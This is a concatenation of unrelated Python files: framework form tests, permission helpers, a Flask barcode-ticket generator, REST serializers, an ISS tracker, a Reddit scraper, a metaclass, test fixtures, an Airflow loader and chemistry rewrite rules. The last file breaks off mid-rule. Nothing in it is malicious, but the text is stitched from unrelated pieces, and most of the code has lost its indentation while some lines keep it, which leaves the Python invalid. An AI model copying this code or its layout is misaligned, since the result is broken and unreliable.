def form_get_list(req, resp):
return req.get_list('multiple_text')
result = client.post(path='/form_get_list', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert isinstance(response, list)
for i in range(2):
assert response[i] == 'test'
def test_wsgi_form_get_file(client):
@register.resource('POST', '/form_get_file')
def form_get_file(req, resp):
file = req.get_file('file')
response = {}
response['name'] = file.filename
response['type'] = file.type
response['data'] = file.file.read()
return response
result = client.post(path='/form_get_file', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
assert response['name'] == 'file'
assert response['type'] == 'application/octet-stream'
assert response['data'] == 'test\n'
def test_wsgi_form_get_files(client):
@register.resource('POST', '/form_get_files')
def form_get_files(req, resp):
file = req.get_files('multiple_file')
response = []
for f in file:
o = {}
o['name'] = f.filename
o['type'] = f.type
o['data'] = f.file.read()
response.append(o)
return response
result = client.post(path='/form_get_files', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
for i in range(2):
assert response[i]['name'] == 'file'
assert response[i]['type'] == 'application/octet-stream'
assert response[i]['data'] == 'test\n'
def test_wsgi_form_get_all_files(client):
@register.resource('POST', '/form_get_all_files')
def form_get_all_files(req, resp):
file = req.get_all_files()
response = []
for f in file:
o = {}
o['name'] = f.filename
o['type'] = f.type
o['data'] = f.file.read()
response.append(o)
return response
result = client.post(path='/form_get_all_files', headers=headers, body=payload)
assert result.status_code == 200
response = result.json
for i in range(3):
assert response[i]['name'] == 'file'
assert response[i]['type'] == 'application/octet-stream'
assert response[i]['data'] == 'test\n'
|
import logging
from docserver.config import config
from docserver.db import models as db_models
logger = logging.getLogger(__name__)
def add_permission(username: str, permission: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
user.add_permission(permission, db=db)
def remove_permission(username: str, permission: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
user.remove_permission(permission, db=db)
def list_permission(username: str, provided_permissions=None):
db = config.db.local_session()
global_admin_permission = db_models.Permission.read_unique(db, dict(scope=config.permissions.default_admin_permission,
operation='admin'))
if not global_admin_permission.check(provided_permissions):
raise PermissionError
user = db_models.User.get_or_create(dict(username=username), db=db)
return user.permissions
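# Possible refactor (sketch, not wired in above): the three functions repeat the
# same global-admin gate, which could be factored into a single helper.
def _require_global_admin(db, provided_permissions):
    permission = db_models.Permission.read_unique(
        db, dict(scope=config.permissions.default_admin_permission,
                 operation='admin'))
    if not permission.check(provided_permissions):
        raise PermissionError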
|
from flask import Flask, render_template
from flask import request, escape, send_file, send_from_directory, current_app
from PIL import Image
import random
import pandas as pd
from datetime import date
import os
from barcode import EAN13
from barcode.writer import ImageWriter
import numpy as np
import PyPDF2
import shutil
from utils import delete_blob, check_if_duplicates, add_margin, get_concat_h, get_concat_v, get_image, save_image, save_pdf, get_pdf
import glob
from google.cloud import storage
from google.api_core import exceptions
import io
app = Flask(__name__)
app.config['bucket'] = "eru-relief-barcode-generator.appspot.com"
app.config['codes_blob'] = "barcodes/codes.csv"
app.config['images_tmp'] = "images/tmp"
app.config['images_final'] = "images"
storage_client = storage.Client.from_service_account_json('creds.json')
barcodes_public_url = ""
@app.route("/")
def index():
# delete old barcodes
try:
delete_blob(storage_client, app.config['bucket'], app.config['codes_blob'])
bucket = storage_client.get_bucket(app.config['bucket'])
bucket.delete_blobs(blobs=list(bucket.list_blobs(prefix=app.config['images_tmp'])))
bucket.delete_blobs(blobs=list(bucket.list_blobs(prefix=app.config['images_final'])))
except exceptions.NotFound:
pass
return render_template('form.html')
@app.route("/generate_barcodes", methods=['GET', 'POST'])
def generate_barcodes():
if request.method == 'GET':
return f"The URL /data is accessed directly. Try going to '/form' to submit form"
if request.method == 'POST':
form_data = request.form
bucket = storage_client.get_bucket(app.config['bucket'])
# try:
no_tickets = int(form_data['no_tickets'])
codes = random.sample(range(100000000000, 200000000000), no_tickets)
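        # random.sample draws without replacement, so the codes are already
        # unique; the loop below is only a defensive re-draw.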
while check_if_duplicates(codes):
codes = random.sample(range(100000000000, 200000000000), no_tickets)
codes.sort()
df = pd.DataFrame({'barcode': codes})
df = df.sort_values(by=['barcode'])
# save codes to csv
blob = bucket.blob(app.config['codes_blob'])
blob.upload_from_string(df.to_csv(), 'text/csv')
list_im_path = []
for code in codes:
image_path = app.config['images_tmp'] + f"/{code}.png"
list_im_path.append(image_path)
blob = bucket.blob(image_path)
rv = io.BytesIO()
EAN13(str(code), writer=ImageWriter()).write(rv)
blob.upload_from_string(rv.getvalue(), content_type="image/png")
for image_path in list_im_path:
im = get_image(bucket, image_path)
im_new = add_margin(im, 100, 50, 100, 50, (255, 255, 255))
save_image(im_new, bucket, image_path)
im_index = 0
cnt_page = 0
logo_file = "logos/merged.png"
mergeFile = PyPDF2.PdfFileMerger()
while im_index < len(list_im_path):
print(f"generating page {cnt_page} starting at image {im_index}")
imreflogo = get_image(bucket, logo_file)
imlogo = get_image(bucket, logo_file)
if im_index == 0:
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
else:
im_index -= 1
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
for cnt_row in range(5):
for cnt_col in range(2):
if im_index < len(list_im_path):
img = get_image(bucket, list_im_path[im_index])
save_image(get_concat_h(imref, img),
bucket,
f"{app.config['images_tmp']}/row_{cnt_row}.png")
imref = get_image(bucket, f"{app.config['images_tmp']}/row_{cnt_row}.png")
save_image(get_concat_h(imreflogo, imlogo),
bucket,
f"{app.config['images_tmp']}/rlogo_{cnt_row}.png")
imreflogo = get_image(bucket, f"{app.config['images_tmp']}/rlogo_{cnt_row}.png")
im_index += 1
if im_index < len(list_im_path):
imref = get_image(bucket, list_im_path[im_index])
im_index += 1
imreflogo = get_image(bucket, logo_file)
# merge all rows with barcodes
list_row_path = []
for blob in bucket.list_blobs(prefix=app.config['images_tmp']):
if "row" in blob.name:
list_row_path.append(blob.name)
imref = get_image(bucket, list_row_path[0])
for im_path in list_row_path[1:]:
img = get_image(bucket, im_path)
save_image(get_concat_v(imref, img),
bucket,
f"{app.config['images_tmp']}/page_{cnt_page}.png")
imref = get_image(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.png")
# merge all rows with logos
list_logo_path = []
for blob in bucket.list_blobs(prefix=app.config['images_tmp']):
if "rlogo" in blob.name:
list_logo_path.append(blob.name)
imreflogo = get_image(bucket, list_logo_path[0])
for im_path in list_logo_path[1:]:
imlogo = get_image(bucket, im_path)
save_image(get_concat_v(imreflogo, imlogo),
bucket,
f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
imreflogo = get_image(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
image1 = get_image(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.png")
im1 = image1.convert('RGB')
save_pdf(im1, bucket, f"{app.config['images_tmp']}/page_{cnt_page}.pdf")
image1 = get_image(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.png")
im1 = image1.convert('RGB')
save_pdf(im1, bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.pdf")
mergeFile.append(get_pdf(bucket, f"{app.config['images_tmp']}/page_{cnt_page}.pdf"))
mergeFile.append(get_pdf(bucket, f"{app.config['images_tmp']}/page_logo_{cnt_page}.pdf"))
cnt_page += 1
blob = bucket.blob(f"{app.config['images_final']}/pages_merged.pdf")
fp = io.BytesIO()
mergeFile.write(fp)
blob.upload_from_string(fp.getvalue(), content_type="application/pdf")
return render_template('data.html')
@app.route('/download_codes', methods=['GET', 'POST'])
def download_codes():
bucket = storage_client.get_bucket(app.config['bucket'])
blob = bucket.blob(app.config['images_final'] + "/pages_merged.pdf")
with blob.open("rb") as f:
contents = f.read()
return send_file(io.BytesIO(contents), mimetype='application/pdf',
as_attachment=True, download_name="tickets.pdf")
if __name__ == "__main__":
app.run(host="127.0.0.1", port=7070, debug=True)
|
s = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
def to_base(n, b):
return "0" if not n else to_base(n//b, b).lstrip("0") + s[n%b]
n, m = map(int, input().split())
print(to_base(n, m))
|
from rest_framework import serializers
from goods2.models import Deviceid, DeviceidPrecision, DeviceidTrain, Image, ImageGroundTruth, ImageResult, UpcBind, TrainImage, TrainAction, TrainModel, TrainActionUpcs, ImageTrainModel, TaskLog
class DeviceidPrecisionSerializer(serializers.ModelSerializer):
class Meta:
model = DeviceidPrecision
fields = ('pk', 'truth_rate', 'precision', 'create_time')
read_only_fields = ('create_time',)
class DeviceidSerializer(serializers.ModelSerializer):
device_precisions = DeviceidPrecisionSerializer(many=True, read_only=True)
class Meta:
model = Deviceid
fields = ('pk', 'deviceid', 'state', 'device_precisions', 'create_time', 'update_time', 'commercial_time')
read_only_fields = ('create_time', 'update_time', 'commercial_time')
class DeviceidTrainSerializer(serializers.ModelSerializer):
class Meta:
model = DeviceidTrain
fields = ('pk', 'deviceid','create_time')
read_only_fields = ('create_time',)
class ImageResultSerializer(serializers.ModelSerializer):
class Meta:
model = ImageResult
fields = ('pk', 'image', 'upc', 'score')
class ImageGroundTruthSerializer(serializers.ModelSerializer):
class Meta:
model = ImageGroundTruth
fields = ('pk', 'deviceid', 'upc', 'identify', 'cnt', 'truth_rate', 'precision', 'create_time')
read_only_fields = ('cnt', 'truth_rate', 'precision', 'create_time',)
class ImageTrainModelSerializer(serializers.ModelSerializer):
class Meta:
model = ImageTrainModel
fields = ('pk', 'train_model', 'image')
class UserImageSerializer(serializers.ModelSerializer):
image_results = ImageResultSerializer(many=True, read_only=True)
image_ground_truth = ImageGroundTruthSerializer(many=False, read_only=True)
class Meta:
model = Image
fields = ('pk', 'deviceid', 'source', 'upc', 'image_ground_truth', 'image_results', 'create_time')
read_only_fields = ('create_time',)
class ImageSerializer(serializers.ModelSerializer):
image_results = ImageResultSerializer(many=True, read_only=True)
image_ground_truth = ImageGroundTruthSerializer(many=False, read_only=True)
train_models = ImageTrainModelSerializer(many=True, read_only=True)
class Meta:
model = Image
fields = ('pk', 'deviceid', 'identify', 'source', 'image_ground_truth', 'image_results', 'train_models', 'is_train', 'is_hand','create_time')
read_only_fields = ('create_time',)
class UpcBindSerializer(serializers.ModelSerializer):
class Meta:
model = UpcBind
        fields = ('pk', 'deviceid', 'upc1', 'upc2')
read_only_fields = ('create_time', 'update_time')
class TrainImageSerializer(serializers.ModelSerializer):
class Meta:
model = TrainImage
fields = ('pk', 'deviceid', 'source', 'upc', 'source_from', 'score', 'source_image', 'create_time', 'update_time', 'special_type')
read_only_fields = ('source_image', 'create_time', 'update_time')
class TrainActionUpcsSerializer(serializers.ModelSerializer):
class Meta:
model = TrainActionUpcs
fields = ('pk', 'upc', 'cnt')
class TrainModelSerializer(serializers.ModelSerializer):
class Meta:
model = TrainModel
fields = ('pk', 'model_path', 'checkpoint_step', 'precision', 'create_time')
read_only_fields = ('model_path', 'checkpoint_step', 'precision', 'create_time', )
class TrainActionSerializer(serializers.ModelSerializer):
upcs = TrainActionUpcsSerializer(many=True, read_only=True)
class Meta:
model = TrainAction
fields = ('pk', 'action', 'state', 'deviceid', 'f_model', 'desc', 'train_path', 'create_time', 'update_time', 'ip', 'train_command', 'eval_command', 'complete_time', 'train_cnt', 'validation_cnt', 'upcs')
read_only_fields = ('train_path', 'create_time', 'update_time', 'ip', 'train_command', 'eval_command', 'complete_time', 'train_cnt', 'validation_cnt', 'upcs')
class TaskLogSerializer(serializers.ModelSerializer):
class Meta:
model = TaskLog
fields = ('pk', 'name', 'ip', 'message', 'state', 'create_time', 'update_time')
|
# for matplotlib stuffs
import matplotlib.pyplot as plt
from matplotlib.offsetbox import OffsetImage, AnnotationBbox, TextArea
# for iss api
import urllib.request
import json
import time
# for os
import sys, os
# setting map image
# map_image = 'assets\\1024px-Land_shallow_topo_2048.jpg'
map_image = os.path.join('assets', '1024px-Land_shallow_topo_2048.jpg')
map_ = plt.imread(map_image)
# setting iss icon image
# iss_image = 'assets\\iss.png'
iss_image = os.path.join('assets', 'iss.png')
iss_ = plt.imread(iss_image)
# initialising past locations history
past_loc = []
# minimum and maximum longitude and latitude
min_longi = -180
max_longi = 180
min_lati = -90
max_lati = 90
# setting extent box
BBox = ((min_longi, max_longi,
min_lati, max_lati))
# scale factor
sf = 5
# setting width and height of the map image
width = abs(max_longi - min_longi) / sf
height = abs(max_lati - min_lati) / sf
# zoom factor of the iss icon
z = 0.1
# TODO: dynamic z on sf
def get_iss_loc():
# iss api information
url = 'http://api.open-notify.org/iss-now.json'
# sending api request and returning result
response = urllib.request.urlopen(url)
result = json.loads(response.read())
# gathered iss location
location = result['iss_position']
latitude = location['latitude']
longitude = location['longitude']
timestamp = result['timestamp']
# marking point with request timestamp
return ((float(longitude), float(latitude)), timestamp)
# empty plot
fig, ax = plt.subplots(figsize=(width, height))
# customizing plot
ax.set_xlim(min_longi, max_longi)
ax.set_ylim(min_lati , max_lati)
ax.set_xlabel('Longitudes')
ax.set_ylabel('Latitudes')
ax.grid(True)
# longitude and latitude ticks list
longi_li = list(range(min_longi, max_longi+1, 20))
lati_li = list(range(min_lati, max_lati+1, 30))
def append_deg(x, neg, pos):
if x < 0:
return str(abs(x)) + u"\u00b0" + neg
elif x > 0:
return str(x) + u"\u00b0" + pos
else:
return str(x) + u"\u00b0"
longi_li = list(map(lambda x: append_deg(x, 'W', 'E'), longi_li))
lati_li = list(map(lambda x: append_deg(x, 'S', 'N'), lati_li))
# setting axes ticks
plt.xticks(ticks=list(range(min_longi, max_longi+1, 20)), labels=longi_li)
plt.yticks(ticks=list(range(min_lati, max_lati+1, 30)), labels=lati_li)
# display map with 65% transparency
ax.imshow(map_, alpha=0.65, extent = BBox)
# iss icon
im = OffsetImage(iss_, zoom=z)
fig_num = fig.number
start_time = None
while True:
try:
pt, t = get_iss_loc() # use API to get iss location and timestamp
except Exception as e:
        print('An exception was raised while requesting the API. Details follow:')
        print(e)
        input('Press Enter to quit...')
sys.exit()
if start_time is None: # ensure single time usage
start_time = t
past_loc.append(pt) # saving to past location
# printing information in console
print(f'Timestamp: {time.ctime(t)}\tLatitude: {pt[1]}\tLongitude: {pt[0]}')
# setting title of the plot (dynamic timing)
ax.set_title('World Map\n'+'(Started on: '+time.ctime(start_time)+')\n\nInternational Space Station live Location at '+time.ctime(t))
    # annotating ISS icon
ab = AnnotationBbox(im, pt, xycoords='data', frameon=False)
ax.add_artist(ab)
    # annotating longitude and latitude
tx = TextArea(f"({append_deg(pt[0], 'W', 'E')}, {append_deg(pt[1], 'S', 'N')})")
ab2 = AnnotationBbox(tx, (pt[0], pt[1]-10), xycoords='data', frameon=False)
ax.add_artist(ab2)
# plotting past point
plt.scatter(past_loc[-1][0], past_loc[-1][1], c='r', s=3, alpha=0.9)
plt.pause(5)
# TODO: exit if plot is closed - needs to be fixed
if not plt.fignum_exists(fig_num):
if not os.path.exists('saved_runs'):
os.mkdir('saved_runs')
loc = os.path.join('saved_runs', f'run{start_time}')
print(f'Saving plot as: {loc}')
fig.savefig(loc)
sys.exit()
    ab.remove() # remove previous ISS icon
    ab2.remove() # remove previous latitude/longitude annotation
|
from django.urls import path
from . import views
app_name = 'geonames_place'
urlpatterns = [
path('place_autocomplete/', views.PlaceAutocompleteJsonView.as_view(),
name='place_autocomplete'),
]
|
import json
import requests
from xmltodict import parse
from datetime import datetime
testURL="https://dev.libraries.ou.edu/api-dsl/data_store/data/congressional/hearings/?format=json"
s = requests.session()
r = s.get(testURL).text
dateList = []
htmlList = []
rjson = json.loads(r)
for x in rjson['results']:
for y in x['mods']['extension']:
if "heldDate" in y:
            if isinstance(y['heldDate'], list):
dateList.append(y['heldDate'][1])
else:
dateList.append(y['heldDate'])
for x in rjson['results']:
for y in x['mods']['location']['url']:
if y['displayLabel'] == "HTML rendition":
htmlList.append(y['text'])
for i,url in enumerate(htmlList):
y = datetime.strptime(dateList[i],"%Y-%m-%d")
sdate = y.strftime("%B %d, %Y")
    print(sdate, url)
|
n1 = int(input('Digite um número: '))
n2 = int(input('Digite mais um número: '))
s = n1 + n2
print('a soma vale', s)
|
#!/usr/bin/python
# coding: utf-8
r"""geom/vector.py
"""
from __future__ import division
import logging
import numpy as np
import OCC.gp
import aocutils.tolerance
import aocutils.exceptions
import aocutils.geom._three_d
logger = logging.getLogger(__name__)
class Vector(aocutils.geom._three_d.ThreeD):
r"""3D vector
Can be constructed from 3 parameters or from a tuple of length 3
Examples
--------
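    Illustrative (assumes the from_xyz constructor inherited from ThreeD):
    >>> v = Vector.from_xyz(1.0, 2.0, 3.0)
    >>> v.norm
    3.7416573867739413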
"""
@classmethod
def from_points(cls, start, end):
r"""Create the vector from 2 points
Parameters
----------
start : Point
end : Point
"""
obj = cls()
obj._x = end.X() - start.X()
obj._y = end.Y() - start.Y()
obj._z = end.Z() - start.Z()
return obj
@classmethod
def from_gp_vec(cls, gp_vec):
obj = cls()
obj._x = gp_vec.X()
obj._y = gp_vec.Y()
obj._z = gp_vec.Z()
return obj
@property
def gp_vec(self):
return OCC.gp.gp_Vec(self.X(), self.Y(), self.Z())
@property
def norm(self):
return (self.X()**2 + self.Y()**2 + self.Z()**2)**.5
def to_array(self):
r"""Convert the vector to an array"""
return [self.X(), self.Y(), self.Z()]
def perpendicular(self, other):
r"""Vector perpendicular to self and other
Parameters
----------
other : Vector
The other vector used to compute the perpendicular
"""
if other.norm == 0 or self.norm == 0:
raise aocutils.exceptions.ZeroNormVectorException
return Vector.from_tuple(np.cross(self.to_array(), other.to_array()))
def __add__(self, other):
r"""Add a vector to self
Parameters
----------
other : OCC.gp.gp_Vec or Vector
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() + other.X(), self.Y() + other.Y(), self.Z() + other.Z())
def __sub__(self, other):
r"""Substract a vector to self
Parameters
----------
other : OCC.gp.gp_Vec or Vector
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() - other.X(), self.Y() - other.Y(), self.Z() - other.Z())
def __mul__(self, scalar):
r"""Multiply a vector by a scalar
Parameters
----------
        scalar : float
Returns
-------
Vector
"""
return Vector.from_xyz(self.X() * scalar, self.Y() * scalar, self.Z() * scalar)
    def __div__(self, scalar):
        r"""Divide a vector by a scalar
        Parameters
        ----------
        scalar : float
        Returns
        -------
        Vector
        """
        return Vector.from_xyz(self.X() / scalar, self.Y() / scalar, self.Z() / scalar)
    # With "from __future__ import division", the / operator dispatches to
    # __truediv__, so alias it to keep scalar division working.
    __truediv__ = __div__
    def __eq__(self, other):
        r"""Is self equal to other?
        Parameters
        ----------
        other : OCC.gp.gp_Vec or Vector
        Returns
        -------
        bool
        """
        tol = aocutils.tolerance.OCCUTILS_DEFAULT_TOLERANCE
        if isinstance(other, Vector):
            # gp_Vec.IsEqual takes a linear and an angular tolerance
            return self.gp_vec.IsEqual(other.gp_vec, tol, tol)
        elif isinstance(other, OCC.gp.gp_Vec):
            return self.gp_vec.IsEqual(other, tol, tol)
        else:
            msg = "Incompatible vector geom_type for comparison"
            logger.critical(msg)
            raise TypeError(msg)
def to_dir(self):
r"""Convert a gp_Vec to a gp_Dir
Returns
-------
OCC.gp.gp_Dir
"""
return OCC.gp.gp_Dir(self.gp_vec)
|
import praw
import json
import logging
from concurrent.futures import ThreadPoolExecutor
from .constants import USER_AGENT, BOT_NAME
from ..db import (
create_event,
create_job,
set_job_status,
get_or_create_subreddit,
Event,
SubredditActions,
SubredditFilters,
JobStatus,
Job,
Subreddit
)
from ..quote_generator import generate_complete_model, find_substring
#model = generate_complete_model()
logger = logging.getLogger(__name__)
def json_log(json_obj, log_level='INFO', **json_kwargs):
method = getattr(logger, log_level.lower())
method(json.dumps(json_obj, **json_kwargs))
def get_reddit():
return praw.Reddit(BOT_NAME, user_agent=USER_AGENT)
class RedditJobRunner:
def __init__(self, subreddit_name, action, subreddit_filter='hot'):
self.subreddit = get_or_create_subreddit(subreddit_name)
self.job = create_job(self.subreddit.name, action, subreddit_filter=subreddit_filter)
self.event(f'Job {self.job.uuid} started')
self.job_started()
def dispatch(self):
if self.job.action == SubredditActions.scrape:
self.do_scrape()
elif self.job.action == SubredditActions.comment:
self.do_comment()
def get_submissions(self):
submissions = subreddit_top_n(
self.job.subreddit.name,
self.job.filter,
self.job.scrape_count or 1
)
self.event(f'Fetched submissions from subreddit {self.subreddit.name}')
return submissions
def do_scrape(self):
try:
for submission in self.get_submissions():
self.process_submission(submission)
except Exception as e:
self.event(f'Error: {str(e)}')
logger.exception(str(e))
self.job_error()
else:
self.event(f'Job {self.job.uuid} Completed')
self.job_complete()
def process_submission(self, submission):
for comment in submission.comments:
if len(comment.body) < 50:
continue
path, text = find_substring(comment.body[:50])
if path:
self.event(f'Found comment {comment.name} in {path}: {text}')
def do_comment(self):
pass
def event(self, message):
return create_event(message=message, job=self.job)
def job_complete(self):
set_job_status(self.job, JobStatus.complete)
def job_started(self):
set_job_status(self.job, JobStatus.started)
def job_error(self):
set_job_status(self.job, JobStatus.error)
def subreddit_top_n(subreddit_name, subreddit_filter='hot', n=5):
reddit = get_reddit()
subreddit = reddit.subreddit(subreddit_name)
items = getattr(subreddit, subreddit_filter)(limit=n)
    # return the praw submissions themselves so callers (e.g. do_scrape) can
    # access attributes such as .comments
    return list(items)
def test_task():
top_5 = subreddit_top_n('television')
return create_event(f'Fetched {len(top_5)} submissions')
|
"""
An anchor's behavior is a cascading list of Attrs where the hooks/pipelines/etc
are carried from each class to its subclasses.
Implicit in discussing anchors is class hierarchy. We use the terms parent/child
where child is always the current context. Which means that we don't touch the
child when processing the parent. We always process the class dicts root down.
"""
from collections import defaultdict, OrderedDict
from types import FunctionType
from ..pattern_match import pattern
from .attr import Attr
from ..meta import MetaMeta
class AnchorFuncError(Exception):
pass
class InvalidAnchorOverrideError(Exception):
pass
class AnchorFunc:
"""
Mark certain functions as being wrapped functions for an Attr.
Instead of:
```
def some_hook(self):
yield
__init__ = Attr()
__init__.add_hook(some_hook)
```
we can do:
```
@hook('__init__')
def some_hook(self):
        yield
    ```
    """
def __init__(self, name):
self.name = name
def __call__(self, func):
self.func = func
return self
class hook(AnchorFunc): pass
class pipeline(AnchorFunc): pass
class transform(AnchorFunc): pass
def add_to_attr(attr, func):
""" utility func to add AnchorFunc to an Attr """
assert isinstance(func, AnchorFunc)
anchor_func_type = func.__class__.__name__
adder = getattr(attr, 'add_{type}'.format(type=anchor_func_type))
adder(func.func)
return attr
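# NOTE: only the first base class is inspected; anchors defined on other bases
# in a multiple-inheritance hierarchy are not picked up here.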
def _parent_anchors(bases):
if not bases:
return {}
base_dict = bases[0].__dict__
return {k:v for k, v in base_dict.items() if isinstance(v, Attr)}
def _get_anchor_name(k, v):
anchor_name = k
if isinstance(v, AnchorFunc):
anchor_name = v.name
return anchor_name
def _validate_funcs(funcs):
if len(funcs) == 1:
return True
# Attr can be first entry. Cannot occur after a AnchorFunc.
is_attr = lambda obj: isinstance(obj, Attr)
if any(map(is_attr, funcs[1:])):
raise AnchorFuncError("Cannot have a Attr after AnchorFuncs")
def _reduce_anchor_funcs(funcs):
"""
Merge a list of AnchorFuncs into an Attr. If the first element is
an Attr, then we merge into that Attr.
"""
_validate_funcs(funcs)
if isinstance(funcs, Attr):
return funcs
attr = Attr()
if isinstance(funcs[0], Attr):
attr = funcs[0]
funcs = funcs[1:]
for func in funcs:
add_to_attr(attr, func)
return attr
def _aggregate_anchor_funcs(dct):
""" aggregate a class dict into single Attrs per name """
dct = filter(lambda x: isinstance(x[1], (Attr, AnchorFunc)), dct.items())
items = [(_get_anchor_name(k, v), v) for k, v in dct]
res = defaultdict(list)
for k, v in items:
res[k].append(v)
update = {k:_reduce_anchor_funcs(funcs) for k, funcs in res.items()}
return update
def _merge_parent_child_anchors(dct, bases):
    """
    If the super class has an Attr, we're assuming it is an Anchor.
    Merge each parent anchor with the matching child entry, if any.
    """
    parent_anchors = _parent_anchors(bases)
    update = OrderedDict()
    for k, parent in parent_anchors.items():
        child = dct.get(k, _missing)
        parent, child = _to_anchor(parent, child)
        update[k] = Attr.combine(parent, child)
    return update
_missing = object()
@pattern
def _to_anchor(parent, child):
"""
    if the parent anchor is an Attr, we propagate it.
    if the child is not also an Attr, then we assume something went wrong;
    the child class should know that it needs to be an Attr.
"""
meta [match : parent, child]
~ Attr, Attr | parent, child
~ Attr, _missing | parent, Attr()
~ Attr, FunctionType | parent, Attr(child)
~ _missing, Attr | Attr(), child # new anchor
def anchor_updates(dct, bases):
"""
    Based on the superclasses, generate a dict of new Attrs to
    update the child dct. Essentially creates a manifest of all
    current anchors affecting the class.
    For now we assume that anchors have been propagated properly to the
    super classes, so this doesn't go up the mro to find anchors originally
    defined in a grandparent class.
"""
parent_anchors = _parent_anchors(bases)
child_anchors = _aggregate_anchor_funcs(dct)
all_anchors = set(child_anchors) | set(parent_anchors)
update = {}
for name in all_anchors:
parent = parent_anchors.get(name, _missing)
child = child_anchors.get(name, _missing)
if child is _missing:
child = dct.get(name, _missing)
parent, child = _to_anchor(parent, child)
new_anchor = Attr.combine(parent, child)
update[name] = new_anchor
return update
class AnchorMeta(MetaMeta):
def __new__(cls, name, bases, dct):
update = anchor_updates(dct, bases)
dct.update(update)
return super().__new__(cls, name, bases, dct)
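# Illustrative usage (sketch; class and hook names are made up):
#
#     class Base(metaclass=AnchorMeta):
#         @hook('__init__')
#         def on_init(self):
#             yield
#
#     class Child(Base):
#         @hook('__init__')
#         def on_init_too(self):
#             yield
#
# Child.__dict__['__init__'] ends up as a single Attr carrying both hooks,
# combined root-down by anchor_updates.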
|
import uuid
import pytest
from prices import Money, TaxedMoney
from .....account.models import User
from .....order.models import Order
ORDER_COUNT_IN_BENCHMARKS = 10
@pytest.fixture
def users_for_benchmarks(address):
users = [
User(
email=f"john.doe.{i}@exmaple.com",
is_active=True,
default_billing_address=address.get_copy(),
default_shipping_address=address.get_copy(),
first_name=f"John_{i}",
last_name=f"Doe_{i}",
)
for i in range(ORDER_COUNT_IN_BENCHMARKS)
]
return User.objects.bulk_create(users)
@pytest.fixture
def orders_for_benchmarks(channel_USD, address, users_for_benchmarks):
orders = [
Order(
token=str(uuid.uuid4()),
channel=channel_USD,
billing_address=address.get_copy(),
shipping_address=address.get_copy(),
user=users_for_benchmarks[i],
total=TaxedMoney(net=Money(i, "USD"), gross=Money(i, "USD")),
)
for i in range(ORDER_COUNT_IN_BENCHMARKS)
]
return Order.objects.bulk_create(orders)
|
import os
from airflow.configuration import conf
from ewah.dag_factories import dags_from_yml_file
for dag in dags_from_yml_file(conf.get("core", "dags_folder") + os.sep + "dags.yml"):
# Must add the individual DAGs to the global namespace,
# otherwise airflow does not find the DAGs!
globals()[dag._dag_id] = dag
|
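# These rules are written for MØD, whose `mod` wrapper pre-loads names such as
# ruleGMLString into the script's namespace, so no explicit import appears here.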
knoevenagel_c = ruleGMLString("""rule [
ruleID "Knoevenagel C"
labelType "term"
left [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
node [ id 7 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 7 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
# The C=O that merges should not be a part of a -(C=O)NH2, etc.
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" label "N" label "S" ]
edgeLabels [ label "-" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 7 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_h = ruleGMLString("""rule [
ruleID "Knoevenagel H"
labelType "term"
left [
edge [ source 1 target 2 label "=" ]
edge [ source 3 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
# The C=O that merges should not be a part of a -(C=O)NH2, etc.
constrainAdj [ id 1 op "=" count 0
nodeLabels [ label "O" label "N" label "S" ]
edgeLabels [ label "-" ]
]
# The R can be either C#N or C=O
constrainAdj [ id 6 op "=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
constrainAdj [ id 3 op ">=" count 1
nodeLabels [ label "O" label "N" ]
edgeLabels [ label "-" label "=" label "#" ] # Warning: this may allow =N to be matched as well
]
]""")
knoevenagel_c_inv = ruleGMLString("""rule [
ruleID "Knoevenagel C (inverse)"
labelType "term"
left [
edge [ source 1 target 3 label "-" ]
edge [ source 1 target 2 label "-" ]
edge [ source 2 target 4 label "-" ]
]
context [
node [ id 1 label "C" ]
node [ id 2 label "O" ]
node [ id 3 label "C" ]
node [ id 4 label "H" ]
node [ id 5 label "*" ]
node [ id 6 label "C" ]
node [ id 7 label "C" ]
edge [ source 3 target 6 label "-" ]
edge [ source 3 target 7 label "-" ]
edge [ source 3 target 5 label "-" ]
]
right [
